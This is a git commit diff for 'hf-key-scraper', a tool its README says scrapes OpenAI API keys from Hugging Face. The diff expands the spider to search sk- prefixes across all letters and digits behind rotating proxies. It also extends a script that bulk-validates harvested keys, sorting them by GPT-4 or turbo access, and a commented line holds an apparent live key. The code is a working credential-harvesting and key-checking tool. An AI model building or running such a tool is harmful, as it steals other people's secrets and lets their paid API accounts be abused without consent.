final commit

2023-10-20 18:54:11 -06:00 · 2023-10-20 18:54:11 -06:00 · c13c224b36
parent 15759586e4
commit c13c224b36
6 changed files with 27 additions and 20 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,6 @@
 .idea
+found-keys*.txt
+

 # ---> Python
 # Byte-compiled / optimized / DLL files
--- a/README.md
+++ b/README.md
@@ -1,3 +1,5 @@
 # hf-key-scraper

-Scrape for OpenAI keys on Hugging Face
+Scrape for OpenAI keys on Hugging Face.
+
+This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.
--- a/huggingface/check-keys.py
+++ b/huggingface/check-keys.py
@@ -1,8 +1,9 @@
 import argparse
-import concurrent
 from concurrent.futures import ThreadPoolExecutor
 from pathlib import Path

+from tqdm import tqdm
+
 from keychecker.check import check_key


@@ -17,26 +18,29 @@ def process_key(key):

 def main():
    parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
-    parser.add_argument('input_file', help='Path to the file containing the keys.')
+    parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
    args = parser.parse_args()

-    input_file = Path(args.input_file).resolve().absolute()
-
+    keys = set()
+    for file in args.input_file:
+        input_file = Path(file).resolve().expanduser().absolute()
        if not input_file.exists():
            print('Input file does not exist:', input_file)
            quit(1)
-
-    with open(input_file) as f:
-        content = set(f.read().splitlines())
+        data = set(input_file.read_text().splitlines())
+        keys = keys | data

    # content = ['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']

+    print('Checking', len(keys), 'keys...')
+
    gpt_4 = set()
    gpt_4_32k = set()
    gpt_3 = set()
+    pbar = tqdm(total=len(keys))

    with ThreadPoolExecutor(max_workers=50) as executor:
-        results = executor.map(process_key, content)
+        results = executor.map(process_key, keys)
        for result in results:
            if result is not None:
                if result['has_gpt_4']:
@@ -45,6 +49,8 @@ def main():
                    gpt_4_32k.add(result['api_key'])
                if result['has_only_turbo']:
                    gpt_3.add(result['api_key'])
+            pbar.update(1)
+    pbar.close()
    print('')

    print('GPT4 KEYS:')
--- a/huggingface/huggingface/settings.py
+++ b/huggingface/huggingface/settings.py
@@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
 FEED_EXPORT_ENCODING = "utf-8"

 PROXIES = [
-    "http://172.0.4.7:3128",
-    "http://172.0.4.8:3128",
-    "http://172.0.4.10:3128",
-    "http://172.0.4.12:3128",
+    "http://127.0.0.1:3128"
 ]

 LOG_LEVEL = 'CRITICAL'
--- a/huggingface/huggingface/spiders/huggingface.py
+++ b/huggingface/huggingface/spiders/huggingface.py
@@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
        text = response.text
        matches = self.regex.findall(text)
        if matches:
-            self.logger.error(f"{matches}")
+            self.logger.debug(f"{matches}")
            return FoundItem(url=response.url, matches=matches)
--- a/huggingface/huggingface/spiders/search.py
+++ b/huggingface/huggingface/spiders/search.py
@@ -4,14 +4,14 @@ import time

 import coloredlogs
 import scrapy
-
+from string import ascii_lowercase, ascii_uppercase
 from ..pipelines import FoundItem


 class HFSearchSpider(scrapy.Spider):
    name = "huggingface_search"
    allowed_domains = ["huggingface.co"]
-    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
+    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
    logger = logging.getLogger('HFSearchSpider')
    logger.setLevel(logging.DEBUG)
    coloredlogs.install(logger=logger, level=logging.DEBUG)
@@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
        for key in keys:
            found_keys.add(''.join(key))
        if len(found_keys):
-            self.logger.error(f"{found_keys}")
+            self.logger.debug(f"{found_keys}")
            yield FoundItem(url=response.url, matches=found_keys)